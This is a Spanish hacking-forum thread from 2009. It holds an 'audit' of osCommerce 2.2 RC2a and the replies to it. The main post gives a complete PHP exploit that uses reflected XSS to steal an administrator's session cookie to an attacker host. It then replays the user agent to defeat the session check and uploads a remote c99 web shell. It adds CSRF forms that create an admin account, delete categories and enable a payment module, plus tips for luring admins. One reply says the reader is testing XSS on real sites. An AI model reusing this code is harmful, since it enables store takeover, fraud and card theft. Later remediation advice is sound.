Múltiples vulnerabilidades en Oscommerce 2.2 RC2a

Iniciado por WHK, 18 Junio 2009, 05:22 AM

0 Miembros y 1 Visitante están viendo este tema.

WHK

Bueno, acabo de terminar un documento que les puede servir a varios para poder aprender lo básico de un xss, csrf y alguno que otro bypass, también por otro lado les puede servir para que piensen dos veces que instalar al momento de crear una tienda virtual.




Auditando a Oscommerce 2.2 RC2a

Link para su descarga : http://www.oscommerce.com/solutions/downloads
El presente documento está hecho con motivo de aprender de las vulnerabilidades de Oscommerce y saber como protegernos haciendo buenas elecciones al momento de buscar un sistema web que soporte una tienda online.
Oscommerce actualmente es uno de los sistemas públicos mas utilizados par crear sitios de ventas online, desafortunadamente también es uno de los mas vulnerables. Acá daré a conocer soolo algunos que yo pude encontrar. Si quieres buscar mas fallas de este sistema CMS puedes hacerlo desde acá:
http://www.google.cl/search?hl=es&q=oscommerce+vuln


XSS en múltiples secciones y Bypass al Anti-rrobo de sesiones

Para saber que significa XSS vea la sección de enlaces descriptivos que está al final de este documento.
Dentro del sistema de Administración podemos encontrar una sección donde podemos modificar banners, ahí nos encontramos con el archivo banner_manager.php:
http://127.0.0.1/oscommerce/admin/banner_manager.php?page=1&bID=1&action=new

Acá podemos ver una clara vulnerabilidad de tipo XSS en la variable llamada "page", probemos ...
http://127.0.0.1/oscommerce/admin/banner_manager.php?page=1'"><h1>lol&bID=1&action=new

Vemos lo siguiente:


Esto nos quiere decir que pudimos inyectar código HTML con éxito dentro del sistema WEB.
Actualmente este tipo de vulnerabilidades se cataloga como nivel medio bajo en lo que a peligrosidad se refiere tanto en Securityfocus como en Secunia, Firstit, Vupen, etc etc, pero yo les voy a demostrar que un escape de código html dentro de tu sitio web puede causar muchos riesgos.

Primero vamos a planear que hacer para poder tener las ideas mas claras.
Haremos un script en php y si el administrador lo ve desde su explorador entonces le robaremos su sesión y con eso ya podremos hacer lo que se nos antoje como por ejemplo subirle una shell.

Abrimos nuestro editor de textos y manos a la obra:
Código (php) [Seleccionar]
<?php
/* Prueba de concepto para Oscommerce 2.2, Upload de Shell via XSS. Por WHK */
$web_vulnerable 'http://127.0.0.1/oscommerce/'/* La URL de la web vulnerable */
$url_shell 'http://www.geocities.com/zkizzik/c99.txt'/* La URL de la Shell local o remnota */
$logs md5($web_vulnerable).'_logs.txt'/* Log donde se guardará el estado del ataque */
 
if(!$_GET){ /* Si no hay variables entonces procede a ... */
/*
Redirecciona al visitante hasta la página del oscommerce vulnerable,
obiamente lo enviamos hacia una url que causará que el mismo inyecte 
código html en su propia web, este código html dirá que nos envie su cookie
hasta este mismo script para su recepción y utilización.
*/
/* Si la url no contiene un slash al final entonces se lo agrega */
if($web_vulnerable[strlen($web_vulnerable) - 1] != '/'$web_vulnerable .= '/';
logs('Redireccionando hacia el XSS');
header(
 
'Location: '.
 
$web_vulnerable.
 
'admin/banner_manager.php?page=1"><script src=http://'.
 
$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']
 .
'?acc=js></script><br x="&bID=1&action=new'); // Redirección
 /* como Oscommerce agrega slashses a las comillas entonces intentaremos usar un incluye */
exit;
 
/* el dichoso javascript que nos robará la sesión */
}elseif($_GET['acc'] == 'js'){
 
logs('Enviando código javascript');
 die(
'
  /* Script que obtiene galletas con sabor a chocolate */
  document.location="http://'
.
  
$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].
 
'?acc=choco&galleta=" + escape(document.cookie) + "&uag=" + '.
 
'escape(navigator.userAgent);
 '
);
 
/* Recibe la cookie y comienza la massacre */
}elseif($_GET['acc'] == 'choco'){
 
logs('Cookie recibida Cookie='.$_GET['galleta'].'');
 if(!
$cookie urldecode($_GET['galleta'])){
  
logs('Se ha intentado enviar una cookie sin contenido');
  exit; 
/* Si no hay cookie se detiene */
 
}
  
/* Separa el host con la ruta para procesar la conexión sin CURL para mayor compatibilidad */
 
$host explode('/'$web_vulnerable);
 
$host $host[2];
 
$url explode('http://'.$host$web_vulnerable);
 
$url $url[1].'/';
 
// Envía la shell
 
if(!$shell file_get_contents($url_shell)){
  
logs('No se pudo obtener la shell');
  exit;
 }
 
$post_data 
'-----------------------------66182058019796
Content-Disposition: form-data; name="file_1"; filename="config.php"
Content-Type: text/x-php
 
'
.$shell.'
-----------------------------66182058019796
Content-Disposition: form-data; name="file_2"; filename=""
Content-Type: application/octet-stream
 
 
-----------------------------66182058019796
Content-Disposition: form-data; name="file_3"; filename=""
Content-Type: application/octet-stream
 
 
-----------------------------66182058019796
Content-Disposition: form-data; name="file_4"; filename=""
Content-Type: application/octet-stream
 
 
-----------------------------66182058019796
Content-Disposition: form-data; name="file_5"; filename=""
Content-Type: application/octet-stream
 
-----------------------------66182058019796
Content-Disposition: form-data; name="x"
 
'
.rand(10,19).'
-----------------------------66182058019796
Content-Disposition: form-data; name="y"
 
'
.rand(10,19).'
-----------------------------66182058019796--
 
'
;
 
 
/* conexión y comprobación */
 
if(!eregi('302'enviar_socket(
'POST '.$url.'admin/file_manager.php?action=processuploads HTTP/1.1
Host: '
.$host.'
User-Agent: '
.urldecode($_GET['uag']).'
Connection: close
Referer: http://'
.$host.'/'.$url.'admin/file_manager.php?action=upload
Cookie: '
.$cookie.'
Content-Type: multipart/form-data; boundary=---------------------------66182058019796
Content-Length: '
.(int)strlen($post_data)."\n\n".$post_data))){
  
logs('Error inesperado al intentar subir la shell o sistema no vulnerable');
  exit;
 }
 
 
/* Valída el upload y verifica si terminó correctamente */
 
if(eregi('images/icons/success.gif'enviar_socket(
'GET '.$url.'admin/file_manager.php HTTP/1.1
Host: '
.$host.'
User-Agent: '
.urldecode($_GET['uag']).'
Connection: close
Referer: http://'
.$host.'/'.$url.'admin/file_manager.php?action=processuploads
Cookie: '
.$cookie."\n\n\n"))){
  
logs('Shell subida con éxito hacia URL='.$web_vulnerable.'config.php');
 }else{
  
logs('Error inesperado al intentar subir la shell o sistema no vulnerable');
  exit;
 }
}
 
function 
handle_socket(){
 global 
$host;
 if(!
$handle fsockopen($host80)){
  
logs('El servidor remoto no responde');
  exit;
 }
 return 
$handle;
}
 
function 
enviar_socket($buffer){
 
$handle handle_socket();
 
fwrite($handle$buffer);
  while(!
feof($handle)){
  
$buffer .= fgets($handle128);
 }
 
fclose($handle);
 if(!
$buffer){
  
logs('El servidor remoto no responde');
  exit;
 }
 return 
$buffer;
}
 
function 
logs($contenido){
 global 
$logs;
 if(
file_exists($logs)) $modo 'a'; else $modo 'x';
 if(!
$handle fopen($logs$modo)) return false;
 
fwrite($handle'[+] DATE['.date(DATE_RFC822).'] IP['.$_SERVER['REMOTE_ADDR'].'] LOG['.$contenido."]\x0D\x0A");
 
fclose($handle);
}
?>


Ahora, antes de explicar lo que hace cada línea les voy a decir como funciona.
Primero que nada debemos encontrar al Administrador con su sesión activa dentro del sistema y luego hacer que visualice este código WEB. Para hacerlo vamos a suponer una situación donde nos conectamos vía IRC o MSN con el Administrador y le sugerimos una configuración para poder optimizar su sitio Web como por ejemplo un dimensionado de la imagen de su banner o lo que sea, después que ya estamos seguros que está logueado le decimos que observe el tutorial donde se muestra con mas detalle y le damos la página que lo redireccionará hacia el XSS. También puedes enviarle múltiples Spam a su correo y esperar a que haga clic en una mientras está trabajando en su página. También puedes ocultar el script dentro de un iframe de 1 x 1 pixel mientras lee o ve un video ocultando la redirección.
En fin, hay muchas formas para hacer caer a alguien con tal de que vea el script que acabamos de hacer, una ves que lo haga solamente pasarán unos 2 o tres segundos y automáticamente se le subirá una shell a su propio servidor y quedará masomenos así:


Ahora si voy a explicar un poco el código para que todo mortal pueda entender que hace sin entrar mucho en el lenguaje de programación ya que los que saben está claro que ya saben como está hecho.

Para subirle la shell necesitamos primero ser Administradores, eso es normal así que primero vamos por la cookie, cuando el Administrador vea el script lo primero que se hará es redireccionarlo hacia:
http://127.0.0.1/oscommerce/admin/banner_manager.php?page=1"><script src=http://atacante.com/demanda.php?acc=js></script><br x="&bID=1&action=new

Lo que hará es redireccionarlo hacia la Web vulnerable e inyectará esto:
Citar"><script src=http://atacante.com/demanda.php?acc=js></script><br x="

Asi que parte del código fuente queda de esta forma:
Código (html4strict) [Seleccionar]
<form name="new_banner" action="http://127.0.0.1/oscommerce/admin/banner_manager.php?page=1\"><script src=http://atacante.com/demanda.php?acc=js></script><br x=\"&action=update" method="post" enctype="multipart/form-data">

De esta forma insertamos el archivo javascript dentro del código HTML sin romper su estructura y evitamos que se vea mal en caso de que algo falle.
Ahora este javascript nos ejecutará lo siguiente:
Código (javascript) [Seleccionar]
/* Script que obtiene galletas con sabor a chocolate */
document.location="http://atacante.com/demanda.php?acc=choco&galleta=" + escape(document.cookie) + "&uag=" + escape(navigator.userAgent);


Como ahora si podemos usar comillas dobles (recordemos que Oscommerce agrega salsees como si fuera magic quotes para prevenir no se que cosa porque hasta ahora no sirve de nada) hacemos que nos redirecciones hacia mi Web atacante y envíe la cookie (recuerden que la cookie es nuestra sesión como administradores). Algunas personas podrán simplificar esto con eval y charcote haciendo la redirección saltándose el paso de la inclusión del Script (si no entendiste no importa porque no es relevante para el que no sabe mucho del tema).
¿Porqué necesitamos el User Agent? (nombre del navegador):
En Oscommerce hay un sistema de seguridad para "supuestamente" prevenir este tipo de ataques, entonces lo obtenemos y lo utilizamos en nuestro script.
Código de "supuesta" seguridad en Oscommerce (Archivo "incluyes/application_top.php" Linea 227):
Código (php) [Seleccionar]
if ($SESSION_USER_AGENT != $http_user_agent){
     tep_session_destroy();
     tep_redirect(tep_href_link(FILENAME_LOGIN));
}


Bueno, ahora lo usamos en nuestro Script:
Código (php) [Seleccionar]
User-Agent: '.urldecode($_GET['uag']).'

Ahora que tenemos la cookie y el user agent podemos hacer lo que se nos antoje como modificar la contraseña, cambiar el correo para después recuperar el password, subir una shell, eliminar todo y poner una Web porno, modificar archivos php para capturar tarjetas de crédito con cvv2, etc etc (recuerden que esto es solo una prueba de concepto para demostrar lo que se puede llegar a hacer no para que lo pongan en práctica).

El resto del Script lo que hace es enviar el archivo de nuestra Shell de pruebas al servidor desde:
http://127.0.0.1/oscommerce/admin/file_manager.php?action=processuploads

Respetando el referer que es desde "admin/file_manager.php?action=upload" y enviamos nuestra petición POST con 5 archivos, si pones solo uno te lo rechaza, ponemos nuestra shell en el archivo 1 y los demás en blanco, ahora nos darán una redirección hacia "admin/file_manager.php" así que la visualizamos y nos valida recién el upload.
También me encontré con dos variables, una llamada "y" y "x" con un valor al azar entre 1 y 20 así que se lo agregué al script para poder reflejar una simulación lo mas igualada posible a un explorador, si se los sacas no funcionará.

Secciones donde puedes encontrarás XSS:
http://127.0.0.1/oscommerce/admin/categories.php?action=new_product_preview&read=only&pID=18&origin=stats_products_viewed.php?page=1'"><h1>test
http://127.0.0.1/oscommerce/admin/configuration.php?gID=1'"><h1>test
y en casi todas las secciones de administración donde veas una variable "page", "id", etc etc. Solo es cosa de ir probando porque si me pongo a mostrarlas todas voy a terminar este documento el año que viene.


Múltiples XSRF (Cross Site Request Forgery)

Para saber que significa XSRF vea la sección de enlaces descriptivos que está al final de este documento.
Primeramente intentaré eliminar una categoría manualmente y al hacerlo me pide una confirmación, al darle clic al botón para aceptar su eliminación me pongo a visualizar los datos que estoy enviando desde el Live Headers:


Citarhttp://127.0.0.1/oscommerce/admin/categories.php?action=delete_category_confirm&cPath=

POST /oscommerce/admin/categories.php?action=delete_category_confirm&cPath= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U ...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://127.0.0.1/oscommerce/admin/categories.php?cPath=&cID=1&action=delete_category
Cookie: osCAdminID=hfk8d6gg5n455ld7i4q20c4pf7; osCsid=pmvjahohiq09e0j2hr0rujffl0
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

categories_id=1&x=17&y=11

Acá vemos que se envía la variable categories_id diciendo que se va a eliminar pero en ningún lado vemos que nos adjunta algún tipo de dispositivo de seguridad que evite un ataque automatizado, por ejemplo un hash o cosas similares por lo tanto el ataque es tan obvio como la falla:
Código (html4strict) [Seleccionar]
<form method="post" action="http://127.0.0.1/oscommerce/admin/categories.php?action=delete_category_confirm&cPath=">
<input type=hidden name="categories_id" value="1" />
</form>
<script>document.getElementsByTagName("form")[0].submit();</script>


Creamos un archivo HTML que contenga esto y hacemos que el administrador lo visualize, al hacerlo estará eliminando involuntariamente la primera categoría de productos de su tienda virtual.
Esto podemos hacerlo con cualquier tipo de dato o configuración ya que en ningún caso se verifica un hash para prevenir este tipo de ataques.

Te gustaría crear un nuevo usuario con derechos de Administración?
Código (html4strict) [Seleccionar]
<form method="post" action="http://127.0.0.1/oscommerce/admin/administrators.php?action=insert">
<input type=hidden name="username" value="r00t" />
<input type=hidden name="password" value="r00ted" />
<input type=hidden name="x" value="16" />
<input type=hidden name="y" value="13" />
</form>
<script>document.getElementsByTagName("form")[0].submit();</script>


Tan fácil y sencillo.

También puedes activar de forma remota tipos de pago:
http://127.0.0.1/oscommerce/admin/modules.php?set=payment&module=paypal_express&action=install

Acá activas el tipo de pago Paypal Express y tener la oportunidad de hacer compras fraudulentas si es que es un sitio de ventas en tiempo real como por ejemplo venta de softwares.
Incluso puedes adjuntarlo en una imagen o un avatar, etc:
Código (html4strict) [Seleccionar]
<img src="http://127.0.0.1/oscommerce/admin/modules.php?set=payment&module=paypal_express&action=install" />

Otro problema de Oscommerce es que utiliza $_SERVER['PHP_SELF'] en casi todas sus secciones y este parámetro si no se sabe utilizar puede causar fallas de tipo XSS:


Si buscamos sin mucho detalle:


Tenemos 26 archivos solamente con esta vulnerabilidad.
En este caso como no necesariamente está en el sistema de Administración puede lanzarse con toda confianza un ataque al propio administrador sin preocuparse si su directorio está protegido por Apache (autentification) ya que desde el mismo javascript con XMLHTTP puedes comprobar si tienes acceso o no y evitar un pantallaza del login, incluso puedes lanzar un popup por detrás del navegador y con un javascript que constantemente verifique si el Administrador entró en el sistema o no para poder continuar con el ataque.
También puedes afectar a los usuarios y robarle sus sesiones y apoderarse de sus compras.

¿Que tal estaría poder modificar el precio de los productos?, a mi no me gustaría que me hicieran eso y no se si a alguna empresa le guste tampoco.


Conclusión

Oscommerce es un sistema muy útil pero llega a ser tan útil como inseguro y es una situación bastante delicada cuando se pretende cobrar dinero de forma online y tener tu propia tienda virtual.

Que sea gratuito no significa que sea malo, las vulnerabilidades las pueden cometer muchos programadores incluso los que se dedican a la venta de sistemas entre comillas. Hay muchas alternativas mejores por el mismo precio ($0) que están licenciada bajo la licencia GNU.

Una vulnerabilidad no es algo aislado que puedas ver en un foro o en un grupo de personas con tiempo libre, es algo que se toma muy en serio cuando se habla de sistemas profesionales, no creo que alguien se desgaste haciendo una bóveda del porte de una cancha de fútbol sin ponerle la cerradura a la puerta.

Muchos sitios que hablan sobre Advisories dicen que el XSS es considerado de riesgo a nivel medio (antiguamente era bajo), pues para mi puede ser tan fatal como cualquier otro así que si tienes un XSS en tu sitio Web te recomiendo que lo repares.

Puedes ahorrar una buena cantidad de dinero mensualmente evitando que tu técnico venga a reinstalar tu sitio Web porque fue penetrada y también te ahorras el dinero del auditor para corroborar si no hay indicios de rooteo que pueda comprometer al servidor en un futuro después de haber hecha la reinstalación.


Enlaces descriptivos

http://es.wikipedia.org/wiki/Cross-site_scripting
http://es.wikipedia.org/wiki/Cross_Site_Request_Forgery
http://es.wikipedia.org/wiki/Agentes_de_usuario
http://www.google.cl/search?hl=es&q=bypass+vuln
(Bypass: Descubrimiento de evasión, en este caso se trata de evadir el sistema de protección que evita un ataque.)
http://www.oscommerce.com/
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones-t244090.0.html
http://foro.elhacker.net/documentacion/los_poderes_secretos_de_xss_cross_site_scripting-t98324.0.html
http://www.google.cl/search?hl=es&q=xss+vuln
http://es.wikipedia.org/wiki/GPL
http://www.gnu.org/licenses/licenses.es.html


Agradecimientos

Gracias al foro de ElHacker.Net por darme la oportunidad de tener cada día mas conocimiento frente al tema de la seguridad informática y aplicarlo en el mundo laboral.
Gracias a Nakp por prestarse siempre de betatester para lo que sea aunque en esta ocasión no se pudo porque no le avisé :p
Gracias a KrackWar por su vida social (nuevamente)
Gracias a mi compadre Octalh por llevarme por el camino del conocimiento y el Software Libre XD
Gracias a mis amigos de la red: MITM, Sirdarckcat, Unika, PokasPulgas, Nano N Roses, Dementes en el espacio, CarlosWaldo (alias carlos aguado) y a todos los de la sala de Yahoo Chat "Cristianismo:1" y "Programación:1".


Att, WHK.
www.kernel32@gmail.com
http://foro.elhacker.net/profiles/whk-u148268.html

Puedes publicar este documento donde tu quieras siempre y cuando no sea modificado.



Si tienen alguna duda pregunten porque nadie ha nacido sabiendo las cosas.
Descarga en formato .doc acá

Og.

como siempre...

grandioso y muy bien explicado

gracias  :D :D :D
|-

VirucKingX

Te felicito WHK  ;-) , exelente información y muy bien explicado.


Chau - aguante XSS -


Bye

braulio--


Azielito

Se puede poner "seguridad" ante éstos ataques con algun mod de apache? (mod_security, mod_rewrite)

con mod_rewrite me imagino crear una regla
Código (pseudo) [Seleccionar]
si en URL encuentras '<>|%'
redirecciona error 403
#o cualquiera

O, en algún archivo de configuración [el de conexion a bases de datos, por ejemplo] poner una función para que nos quite esos "caracteres malditos" :')
Y ahora que recuerdo, un amigo me dijo que el sistema ese requiere register_globals=on :')

Y del mod_security no puedo decir nada ya que no lo he usado :')

Jubjub

Simplemente IMPRESIONANTE.

Gran trabajo, me ha hecho ver el autentico potencial de los XSS. Gracias WHK!
Jugando con Fósforoshacking con un tono diferente


.
porno

MagnoBalt



WHK

#8
Trackeado:
http://svn.oscommerce.com/jira/browse/OSC-937

CitarSe puede poner "seguridad" ante éstos ataques con algun mod de apache? (mod_security, mod_rewrite)

con mod_rewrite me imagino crear una regla
Código

si en URL encuentras '<>%'
redirecciona error 403
#o cualquiera

O, en algún archivo de configuración [el de conexion a bases de datos, por ejemplo] poner una función para que nos quite esos "caracteres malditos" :')
Y ahora que recuerdo, un amigo me dijo que el sistema ese requiere register_globals=on :')

Y del mod_security no puedo decir nada ya que no lo he usado :')

Tienes razón:
includes/application_top.php Linea 19
Código (php) [Seleccionar]
// check support for register_globals
 if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) {
   exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.');
 }


Hay un sitio web en mi pais super conocido que vende atriculos de pc que funciona bajo oscommerce, no quiero dar nombre pero está en la calle san diego  :P y utilizan mod security para evitar ataques como si fuera un ids, al intentar inyectar código javascript te detiene y dice "no aceptable", es como lo que tu quieres hacer pero lo malo es que esos metodos no son 100% efectivos, es como decir que un antivirus me va a detener todos los virus que existen, eso es falso pero si puede evitar la mayoría de los ataques. De todas formas alguien con bastante conocimiento siempre podrá evadirlo, por ejemplo ellos filtran "<script>" pero si das "<ScrIPt x=x>" no dice nada y me lo acepta, aunque no quiere decir que alguien decidido hará cosas tan básicas, talves pueda escapar con vbscript o string.charcode, etc.
Recuerda que ni si quiera sistemas como No-Script, PHPIDS y el filtro del internet exploter son perfectos y todos los dias se van actualizando, imagina si le pones algo similar a tu servidor, tendrias que tener a alguien dedicado en buscar fallas cada ves que pueda tratando de hacer mas fuerte el filtro pero aun así no sería perfecto ya que si filtras todos los tags talves el buscador deje de funcionar y si lo admites talves mas adelante salga una inyección con carácteres unicode, etc quien sabe.

La única solución que veo es reprogramarlo nuevamente y hacerlo bién para evitar problemas, usar htmlspecvialchars con ENT_QUOTES, mysql escape real string, (int), etc etc.

Un sistema con una buena programación no debería fallar de esta forma, talves smf , joomla y wordpress hayan tenido fallas también pero no todas simultaneamente jajaja.

Si irremediablemente tienes un oscommerce y no puedes desacerte de el por el momento puedes hacerle un include en el index.php hacia un nuevo script que filtre todas las variables $_GET, $_POST $_COOKIE y $_SERVER con htmlspecialchars antes de continuar, con esto evitas el xss aunque no es lo mas óptimo porque los resultados de las busquedas no serán exactas y talves los nicks con carácteres especiales se vean mal. esto no evita los CSRF ya que para eso deben integrar un token o algo que sea al azar tal como lo hacen casi todos los sistemas mas grandes.

Azielito, recuerda que no todos tienen la posibilidad de acceder al servidor e instalar cosas ya que muchos deben estar usando hostings de pago normal asi que hay que dar soluciones que todos puedan implementar.

CitarGran trabajo, me ha hecho ver el autentico potencial de los XSS. Gracias WHK!
Claro, la idea es poder aprender en la práctica y salir un poco de los tutos  :P , dicen que la práctica y el tiempo libre hacen al maestro  :xD

PD: http://demo.oscommerce.com/index.php/"><h1>XSS

Saludos.

Jubjub

Cita de: WHK en 18 Junio 2009, 23:32 PM
y el tiempo libre hacen al maestro  :xD

Ahi le has dado :P

Gracias a esto ando experimentando con XSS en algunas paginas conocidas.. y con resultados positivos, vere si soy capaz de crear algo explotable :)
Jugando con Fósforoshacking con un tono diferente


.
porno